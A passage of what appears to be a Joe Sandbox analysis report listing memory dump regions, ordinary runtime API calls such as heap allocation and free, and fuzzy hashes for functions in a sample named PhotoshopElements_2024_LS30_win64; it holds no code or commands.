                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: String
                                                                                                        • String ID:
                                                                                                        • API String ID: 2568140703-0
                                                                                                        • Opcode ID: 1aaf55022382905c92deba1df6a609dfbeb1588f515c4705f945c6271610533e
                                                                                                        • Instruction ID: 6c2c742743d474d7ccd0c36ea256858e20e9072eecf18ade856fb2d4050dd2db
                                                                                                        • Opcode Fuzzy Hash: 1aaf55022382905c92deba1df6a609dfbeb1588f515c4705f945c6271610533e
                                                                                                        • Instruction Fuzzy Hash: DEF0643640021ABBCF126F90DC0A9EE3F66BB487A0F098110FA1825120CA36C872EB94
                                                                                                        APIs
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 003FEA1C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: df92993cafc707e04f03a9d1b505a43721184504c7ffd3ea3968161e3b797750
                                                                                                        • Instruction ID: 57e4a98d7010b8321b8bdfc3cb33dbf297c2323e8cf73351bae69fa199b38cbc
                                                                                                        • Opcode Fuzzy Hash: df92993cafc707e04f03a9d1b505a43721184504c7ffd3ea3968161e3b797750
                                                                                                        • Instruction Fuzzy Hash: 7F615671E00119AFDB10DB68DC45ABFBBB9FF84350F154269E809E3251E774AE50CBA0
                                                                                                        APIs
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0020B5F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: 20bcb3d294b2db284197245d6ad16d1c5d4bbb17dbc0a10b18afb83c155069ae
                                                                                                        • Instruction ID: 254ac97b3a2ac10ca0808c38c33a6dd084fb76859107866c6bdc6252aedff1d0
                                                                                                        • Opcode Fuzzy Hash: 20bcb3d294b2db284197245d6ad16d1c5d4bbb17dbc0a10b18afb83c155069ae
                                                                                                        • Instruction Fuzzy Hash: 9F11573242470609D7365F789885AB9BF5D991233474C03F1D4A98B1E3D323ECA38694
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 8b09d987d8035a72699aaeb8e1ac39346b862d7da2cfe593cc4230762f29966b
                                                                                                        • Instruction ID: 5a021a3c9bc39cb9c1a56812f8e40bfe6d7cdb992e709cd912f3cd94400c5760
                                                                                                        • Opcode Fuzzy Hash: 8b09d987d8035a72699aaeb8e1ac39346b862d7da2cfe593cc4230762f29966b
                                                                                                        • Instruction Fuzzy Hash: 0D210871D11626EFCB20AF58A84276ABFE9FB46B20F14460AF5206B2C1C7B06D41DFD1
                                                                                                        APIs
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0020B5A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: da7da7d1bf34d726f51298f8ebd8f99da981de079ffe804aeeed110fd179d263
                                                                                                        • Instruction ID: fbbc6f29c2987765c331c715c1b0658208375e7a3cc45d7a28588f65e7c3a10e
                                                                                                        • Opcode Fuzzy Hash: da7da7d1bf34d726f51298f8ebd8f99da981de079ffe804aeeed110fd179d263
                                                                                                        • Instruction Fuzzy Hash: 85F027B252030A0AE724ABB0AC06A6E3A886E65360B840175F41AC65C3F721D9F4C118
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00538589
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 5f42a3f06e452ee24d87c43980bd43a22fdf228a4a0aea84b90d14b6a1d42f4c
                                                                                                        • Instruction ID: 4c02d1b1092ca7aa65b71e2b32a83f687daa5e378f12bf016a0defe3f89ead75
                                                                                                        • Opcode Fuzzy Hash: 5f42a3f06e452ee24d87c43980bd43a22fdf228a4a0aea84b90d14b6a1d42f4c
                                                                                                        • Instruction Fuzzy Hash: 0BF0E2326003257ADB2A5F629C0AB7A3F88BF85760F185112FC18DA090EE30ED108AE0
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000018,00000018), ref: 00535DE5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 9cf981c19a50b0c14fb6ed1162f9ac3851b62b8c1f689a7cbe3a9b10722fb020
                                                                                                        • Instruction ID: 72b898b7e7a9e9cf7742accd6b6c13485a887dd4bc8958c4ac7ae603a46a9277
                                                                                                        • Opcode Fuzzy Hash: 9cf981c19a50b0c14fb6ed1162f9ac3851b62b8c1f689a7cbe3a9b10722fb020
                                                                                                        • Instruction Fuzzy Hash: 73E06521101B6267DB2127A59C0DB5A3F98FF467A0F152910FC05961D1FF50DE4081B1
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 005218AB
                                                                                                          • Part of subcall function 00535D79: RtlFreeHeap.NTDLL(00000000,00000000,?,0054014F,?,00000000,?,?,?,005403F2,?,00000007,?,?,00540897,?), ref: 00535D8F
                                                                                                          • Part of subcall function 00535D79: GetLastError.KERNEL32(?,?,0054014F,?,00000000,?,?,?,005403F2,?,00000007,?,?,00540897,?,?), ref: 00535DA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFreeHeapLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1353095263-0
                                                                                                        • Opcode ID: f3a033b99421fc2d6e9bb4b685b0e50ec993971f0edb1f47846a6e3c28184d1e
                                                                                                        • Instruction ID: 320ca1a7f84769bb1beb3949e77b81dd9238726d5602f4f9815bfeccc8a24d29
                                                                                                        • Opcode Fuzzy Hash: f3a033b99421fc2d6e9bb4b685b0e50ec993971f0edb1f47846a6e3c28184d1e
                                                                                                        • Instruction Fuzzy Hash: 9EC08C32000208BBCB009F41D80AA4E7FB8EB80364F200044F40157250DAB1EF409680
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3770006025.000000000A850000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A850000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a850000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8aeafd801b1ed2027780da67c1dd6593e0462175cdab21ce322675f16b57e24b
                                                                                                        • Instruction ID: e138c125bdcb50fdfd7332e2eb1670cef00e61a0a1ed7f2f113d9986a927df02
                                                                                                        • Opcode Fuzzy Hash: 8aeafd801b1ed2027780da67c1dd6593e0462175cdab21ce322675f16b57e24b
                                                                                                        • Instruction Fuzzy Hash: DFF03175A042059FD700CFA4D885A9AF7B5EF44214F11824AED14A7305D771AD51DBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3770006025.000000000A850000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A850000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a850000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e8f78a399a4272fec8be24ea6e6f36ef127e4ad8f670e3d3b45aa18f354ca4af
                                                                                                        • Instruction ID: c5ec1f4a65f39466698704ac754d27ce241aa8f51a584a383fb635eec028ce7b
                                                                                                        • Opcode Fuzzy Hash: e8f78a399a4272fec8be24ea6e6f36ef127e4ad8f670e3d3b45aa18f354ca4af
                                                                                                        • Instruction Fuzzy Hash: D1E0927AB192085FCB04CA98DC4199EF3F9EF88225F15014AFE01E7311D670FD008BA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
